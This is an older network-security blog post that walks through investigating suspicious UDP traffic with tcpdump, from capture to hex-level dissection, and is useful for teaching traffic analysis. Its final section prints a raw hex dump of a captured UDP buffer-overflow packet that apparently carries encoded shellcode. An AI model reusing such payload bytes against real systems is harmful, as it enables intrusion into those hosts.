Requirements
Those looking to attend will require:
  • Laptop running Windows 7 (or OSX/Linux but I won't be demonstrating with/troubleshooting these) with WiFi capability. VM is fine, if not preferred)
  • Java Runtime Environment 6 or above
  • Burp Suite 1.4 and above (Professional preferred but Free will be ok)
  • Administrator rights to the machine as they will need to install software (supplied on USB stick)
  • Some programming experience with other languages is assumed. My background is in Bash, Perl, PHP, Python and Ruby if that helps to guage your own capabilities.
Any questions relating to the workshop, requirements and topics can be sent via Twitter (@7Elements) or by email to our usual address contact-us@7elements.co.uk.




Monday, 6 August 2012

Using tcpdump for network analysis

For this post, we are going to look at using tcpdump to investigate potentially malicious traffic and the steps required to complete an investigation. 


This blog post is based on an answer that I provided on the IT Security Stack Exchange site about analysing network traffic for malicious content. If you don't follow stack exchange, then you should. It's a fantastic resource.


So back to the blog. For me, there are three key stages required when investigating potentially malicious or rogue traffic:


Stage 1 - Traffic Capture
Stage 2 - Analysis
Stage 3 - Identification


Each can be delivered either through a very formal process or on an ad hoc basis. The end goal of the investigation would drive this requirement. For this scenario we are taking an ad hoc approach that uses tcpdump to investigate udp traffic.


The section of traffic that we are interested in comprises:

09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0  09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0

10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

So using our three stage approach we will now investigate this further.

Stage 1 - Traffic Capture.
This stage is about using the right tools to capture the traffic.


Tool Choice: 


To do anything sensible is going to require raw packet output, so use your tool of choice (wireshark / tcpdump are two examples). Personally I would use tcpdump, and if needed, load the traffic capture into wireshark for a nice graphical view of the world.

Config: 


You will need to configure the tool to capture the entire packet - by default tcpdump only captures 68 bytes of data. 

I would also capture the hexadecimal output by using the -x flag. Doing so will allow me to examine the individual bits (very important when doing a deep dive on evil packets).

For this post we are interested in UDP traffic, so you can limit the packet capture to UDP only traffic. 

This is done by matching the value of 17 (which is for UDP) in the 9th offset of the IP header. For ease, tcpdump has an inbuilt macro that does this for you by calling the udp flag option.


Execute: 

An example command line for tcpdump would be:
tcpdump udp -s 0 -x -w /udp_traffic


This would capture the entire IP frame with hexadecimal output for UDP traffic only and write this to a file called udp_traffic.

Confirm: 

To confirm that this works you can then run:
tcpdump -r /udp_traffic 

This would give you something like:
09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0  09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0
10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

Stage 2 - Analysis.
Two real options here, use an IDS/IPS solution and replay your traffic to see what alerts this raises and then chase down each alert to understand if it is a false-positive or not. This approach is more scientific and is based on known bad traffic. This would be quicker if the IDS/IPS has already been tuned for the network and the traffic matches known rules.

Or you can use a more gut-feel approach using your knowledge of the network and services that are running to review the traffic. This is more of an art than a science, but has advantages.

People's gut feel is something you can't programme a piece of code to replicate and, if you know your network, things will stick out.

Both approaches will result in the breakdown of traffic into the following groups.


Type of traffic:
  • Breakdown by port
  • Breakdown by source
  • Breakdown by destination
  • Breakdown by port
This will enable you to deal with large amounts of traffic in more manageable chunks and look for patterns.

In our example from earlier, we can see that the packets are all from the 192.168.188.128 network and from port 63793 and heading to 192.168.188.1 on various ports. The first three packets show classic scanning traffic, in this case an nmap scan for udp ports:
09:06:16.982995 IP 192.168.188.128.63793 > 192.168.188.1.42313: UDP, length 0
09:06:16.986062 IP 192.168.188.128.63793 > 192.168.188.1.623: UDP, length 0  09:06:16.986274 IP 192.168.188.128.63793 > 192.168.188.1.30303: UDP, length 0


Traffic content:

If we do find traffic that we don't like the look of, then we can take a look at the hexadecimal output to dissect the packet at a much deeper level. If we take
 09:42:15.206332 IP 192.168.188.128.63793 > 192.168.188.1.52503: UDP, length 0




and look at the hex output we see:
0x0000:  4500 001c 43d7 0000 2a11 5327 c0a8 bc80
0x0010:  c0a8 bc01 f931 cd17 0008 3fc1          



Points of interest would be the first offset (counting from zero), which shows 4 for IPv4. Offset nine shows 11 (remember to convert from hex to decimal) so that is protocol 17, or UDP. 

Then we have source address at offset 12 - c0a8 bc80 (192.168.188.128) and destination address at offset 16 - c0a8 bc01 (192.168.188.1). This is just a simple example, building on this we can then look deeper in to the packet.

Stage 3 - Identify and review rogue traffic.
When you have identified any specific traffic that is of interest then it is a combination of research (Google (Other search engines are available)) and deep packet analysis.

To give a feel, this type of UDP packet would give me concern and warrant further investigation:
10:30:36.313999 IP 192.168.188.128.50056 > 192.168.188.1.26000: UDP, length 2201

This is the last line in our scenario. Why does this jump out? Well, firstly the length of the packet is very large for a UDP packet. So lets take a closer look.

In hex the packet looks like this:
        0x0000:  4500 05dc 7d9c 2000 4011 dda1 c0a8 bc80
        0x0010:  c0a8 bc01 c388 6590 08a1 0c07 425a 7454
        0x0020:  3349 3665 5747 6742 4642 4177 7071 4156
        0x0030:  6c5a 7271 7975 5579 5546 6375 4b76 6c4f
        0x0040:  5762 3853 4578 6757 3766 5837 744f 7572
        0x0050:  766e 746b 4339 6c74 6f6c 6156 4264 3072
        0x0060:  566c 6739 7355 4a37 3550 3848 7a70 4d6f
        0x0070:  6f4b 6e77 7762 4b47 6c6c 4f63 3846 7372
        0x0080:  7a7a 4879 7763 6330 4c77 3172 7048 5941
        0x0090:  4177 5676 727a 6f52 4b32 566c 5a6b 5242
        0x00a0:  696b 4976 3470 547a 3467 6f74 644b 376c
        0x00b0:  3468 3443 5676 4758 4535 6857 6b41 657a
        0x00c0:  4779 7731 654d 314a 5976 7265 3974 6e41
        0x00d0:  305a 4358 6f5a 517a 4344 6378 5634 476d
        0x00e0:  7147 6979 3653 6a69 4331 486b 734f 7844
        0x00f0:  4175 6467 7858 636f 5550 386c 6332 5a6c
        0x0100:  3237 3067 5552 514b 6345 4836 7073 516f
        0x0110:  7a52 6631 315a 6365 3563 4f76 4275 4c4a
        0x0120:  6f74 5032 5057 704f 6f5a 4d58 4369 7666
        0x0130:  3847 6733 5555 5036 6e7a 4c6b 3856 4573
        0x0140:  6b59 646b 6b62 6733 5036 6c4c 534c 3248
        0x0150:  4156 3037 656b 7433 3148 6578 6968 547a
        0x0160:  436f 5635 5957 7165 6d66 4565 3563 494d
        0x0170:  6570 7947 4174 5559 4c57 5a59 6d63 3671
        0x0180:  4333 4a4e 7269 4778 5968 6b6b 4155 7a39
        0x0190:  6c53 5772 5573 5644 684f 3456 3237 5267
        0x01a0:  634a 326c 4558 6e5a 6b5a 5255 486f 6436
        0x01b0:  6878 4770 5053 4178 426a 6651 6c53 4e70
        0x01c0:  5970 646b 5539 735a 3254 737a 6964 4a46
        0x01d0:  4b4c 504e 7244 7451 7a41 4945 3233 5951
        0x01e0:  586d 4866 7a54 334c 7947 4145 5041 6a65
        0x01f0:  4850 4665 3168 7446 4639 4172 4731 526e
        0x0200:  324d 5151 4641 737a 4f53 4556 7332 5a38
        0x0210:  614d 735a 3978 444b 4565 5054 7459 5663
        0x0220:  7837 3059 3666 3871 754e 3377 7252 3659
        0x0230:  344c 586c 5232 7265 5a6f 416b 785a 6961
        0x0240:  5156 3973 3267 6279 5738 6272 7663 5463
        0x0250:  6b62 4e70 5a64 4763 4772 4262 4551 5254
        0x0260:  4757 4d76 4e51 414a 3868 5063 7267 304c
        0x0270:  4b78 784c 6b49 5563 7443 5a36 526b 745a
        0x0280:  4c4e 4c68 7175 4a54 3064 626e 4562 5157
        0x0290:  3068 4730 6e47 3650 5468 3467 4e72 4a6b
        0x02a0:  5a51 5771 4a38 5747 4453 6e64 3971 4650
        0x02b0:  4263 7358 6e46 5173 3057 5a57 6f65 7168
        0x02c0:  7a67 5859 6e74 4138 7457 3672 646b 344a
        0x02d0:  5958 5363 7231 6c6c 696e 6a38 704b 6146
        0x02e0:  786d 4f5a 6c57 4d50 4232 3459 7130 6a4d
        0x02f0:  5278 7330 3352 336f 6742 5661 3245 7879
        0x0300:  4e43 444b 4d4b 424f 7441 6a37 6e51 6238
        0x0310:  4e78 5053 6f39 5a64 3632 3879 6e54 5042
        0x0320:  7736 5258 4e42 3557 704d 6b48 7974 5050
        0x0330:  4777 4e63 3269 7672 7672 4266 697a 4c67
        0x0340:  4568 554a 4636 614b 6a56 7068 4e33 4a4c
        0x0350:  5067 7254 6a67 674c 3337 6574 5934 6836
        0x0360:  394c 354e 3261 7456 7270 4f69 6531 3452
        0x0370:  7568 6835 5374 756e 5676 6f4f 767a 6d6b
        0x0380:  6679 6846 4743 3861 3543 6538 454e 4c4c
        0x0390:  4745 7630 5247 6675 5333 3070 3576 4b62
        0x03a0:  5932 3562 6a38 4752 337a 4973 5068 3867
        0x03b0:  364a 6159 3444 7149 5372 4b63 5547 6f6e
        0x03c0:  4e36 4845 6e43 6534 4b48 5568 5639 4b47
        0x03d0:  3835 5862 5a32 6962 3157 7431 4344 3442
        0x03e0:  496e 644e 445a 6851 6870 4373 6951 5776
        0x03f0:  4438 5874 6578 4c38 4d4a 694c 3368 536c
        0x0400:  664e 3369 75b7 3f07 102d 47b3 10f8 7b04
        0x0410:  a81c 4873 7672 46b0 b823 f58d 4b13 d477
        0x0420:  6692 2ae2 2c1a d598 7c22 d624 ba3f 40b2
        0x0430:  0537 08e0 0c35 900d b7bf 4f43 85e3 3afc
        0x0440:  9671 28e1 7527 a91d 4e99 9f4a 12d1 f97e
        0x0450:  18fd b13c 3d42 9b79 7e77 7b4f 89e1 7970
        0x0460:  730b f8b5 bab8 1d3f 2584 e340 bea8 03d0
        0x0470:  c0d6 9614 b067 98b7 9942 bb97 4bb4 9bbf
        0x0480:  3bd4 88f5 4e0c 7546 3d7d 7c09 e07a 69f9
        0x0490:  2c90 7149 a92f 0415 911c 7224 9f74 7827
        0x04a0:  38d5 7637 b1b2 8ceb 6693 432d 7f02 e234
        0x04b0:  b68d 48b3 791b fc7f 3c75 35b9 7141 7447
        0x04c0:  7805 7d20 eb0d 9272 4a83 e001 e10a d2fd
        0x04d0:  734f 700d 9b7c 14b5 4390 bad3 c1f9 7630
        0x04e0:  f5be bf2d 31e3 351d 81fd 7b39 fc27 7e37
        0x04f0:  80e2 2c34 b0b1 1567 7a0c 4b98 3da8 4940
        0x0500:  bb92 b33f 0425 b71c 8d97 4741 b4f8 b8b9
        0x0510:  7705 86d6 4eb6 9193 46d4 422f a93c 6696
        0x0520:  d5b2 2499 484a 9f56 5458 3633 3057 5458
        0x0530:  3633 3856 5848 3439 4848 4850 5658 3541
        0x0540:  4151 5150 5658 3559 5959 5950 3559 5959
        0x0550:  4435 4b4b 5941 5054 5458 3633 3854 4444
        0x0560:  4e56 4444 5834 5a34 4136 3338 3631 3831
        0x0570:  3649 4949 4949 4949 4949 4949 515a 5654
        0x0580:  5833 3056 5834 4150 3041 3348 4830 4130
        0x0590:  3041 4241 4142 5441 4151 3241 4232 4242
        0x05a0:  3042 4258 5038 4143 4a4a 494b 4c4a 484c
        0x05b0:  4945 5045 5045 5045 304d 594b 5546 514e
        0x05c0:  3245 344c 4b46 3250 304c 4b46 3244 4c4c
        0x05d0:  4b51 4242 344c 4b43 4251 3844          


If we spend time de constructing the packet we will see that there is a lot of data being sent in this single UDP packet, to a high port and from a high source port. In fact, this is an example of a buffer overflow being completed over UDP. 

So as we have seen, just using a simple three stage approach we were able to understand what was going on with the scenario. There was an initial port scan for UDP services at 9am. This was then followed by a UDP based buffer overflow attack against 192.168.188 at 10:30am.